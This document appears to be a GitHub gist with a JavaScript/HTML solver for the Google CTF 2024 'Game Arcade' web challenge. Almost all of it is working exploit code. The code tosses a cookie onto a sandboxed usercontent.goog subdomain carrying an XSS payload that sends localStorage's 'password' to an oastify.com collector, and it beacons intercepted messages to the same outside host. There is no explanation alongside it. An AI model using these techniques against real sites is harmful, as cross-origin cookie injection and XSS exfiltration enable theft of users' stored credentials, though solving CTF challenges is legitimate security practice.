Created
June 29, 2024 05:16
-
-
Save tyage/d3e4e6209e148d0f3d61de168d34071b to your computer and use it in GitHub Desktop.
Google CTF 2024 Game Arcade solver
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<body> | |
<iframe id="frame1"></iframe> | |
<iframe id="frame2"></iframe> | |
<script> | |
function arrayToBase36(arr) { | |
return arr | |
.reduce((a, b) => BigInt(256) * a + BigInt(b), BigInt(0)) | |
.toString(36); | |
} | |
function concatBuffers(...buffers) { | |
let length = 0; | |
for (const buf of buffers) { | |
length += buf.byteLength; | |
} | |
const newBuf = new Uint8Array(length); | |
let offset = 0; | |
for (const buf of buffers) { | |
newBuf.set(new Uint8Array(buf), offset); | |
offset += buf.byteLength; | |
} | |
return newBuf.buffer; | |
} | |
async function calculateHash(...parts) { | |
const encoder = new TextEncoder(); | |
const newParts = []; | |
for (let i = 0; i < parts.length; i++) { | |
const part = parts[i]; | |
if (typeof part === "string") { | |
newParts.push(encoder.encode(part).buffer); | |
} else { | |
newParts.push(part); | |
} | |
if (i < parts.length - 1) { | |
newParts.push(encoder.encode("$@#|").buffer); | |
} | |
} | |
const buffer = concatBuffers(...newParts); | |
const hash = await crypto.subtle.digest("SHA-256", buffer); | |
return arrayToBase36(new Uint8Array(hash)).padStart(50, "0").slice(0, 50); | |
} | |
const attack = () => { | |
location.href = 'https://game-arcade-web.2024.ctfcompetition.com/#1' | |
} | |
const main = async () => { | |
const product = 'google-ctf' | |
const xss = `<img src=x onerror="location = 'https://3y240kppb1yhrjmi4gf4os90xr3iref3.oastify.com/?f=' + encodeURIComponent(localStorage.getItem('password'))">` | |
const body = `<body><script> | |
document.cookie = "password=${encodeURIComponent(xss)}; domain=.0ta1gxvglkyjct11uf3lvr9g3b45whebmhcjklt106au2kgy3e-h641507400.scf.usercontent.goog" | |
<\/script></body>` | |
const mimeType = 'text/html;charset=utf-8' | |
const hash = await calculateHash(product, body, window.origin); | |
const url = new URL( | |
`http://${hash}-h641507400.0ta1gxvglkyjct11uf3lvr9g3b45whebmhcjklt106au2kgy3e-h641507400.scf.usercontent.goog/google-ctf/shim.html` | |
); | |
url.searchParams.set("origin", window.origin); | |
url.searchParams.set("cache", "1"); | |
const safeWindow = window.open( | |
url, | |
"_blank", | |
`width=500, height=500` | |
); | |
const loadedPromise = new Promise((resolve) => { | |
navigator.sendBeacon('https://3y240kppb1yhrjmi4gf4os90xr3iref3.oastify.com', 'window open') | |
const interval = setInterval(() => { | |
const messageChannel = new MessageChannel(); | |
messageChannel.port1.onmessage = () => { | |
resolve(); | |
clearInterval(interval); | |
}; | |
safeWindow.postMessage(1, url.origin, [messageChannel.port2]); | |
}, 100); | |
}); | |
loadedPromise.then(() => { | |
navigator.sendBeacon('https://3y240kppb1yhrjmi4gf4os90xr3iref3.oastify.com', 'send message') | |
const messageChannel = new MessageChannel(); | |
messageChannel.port1.onmessage = (e) => { | |
console.log(e.data); | |
navigator.sendBeacon('https://3y240kppb1yhrjmi4gf4os90xr3iref3.oastify.com', e.data) | |
}; | |
safeWindow.postMessage( | |
{ body, mimeType, salt: new TextEncoder().encode(body).buffer }, | |
url.origin, | |
[messageChannel.port2] | |
); | |
setTimeout(() => attack(), 500) | |
}); | |
} | |
main() | |
</script> | |
</body> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment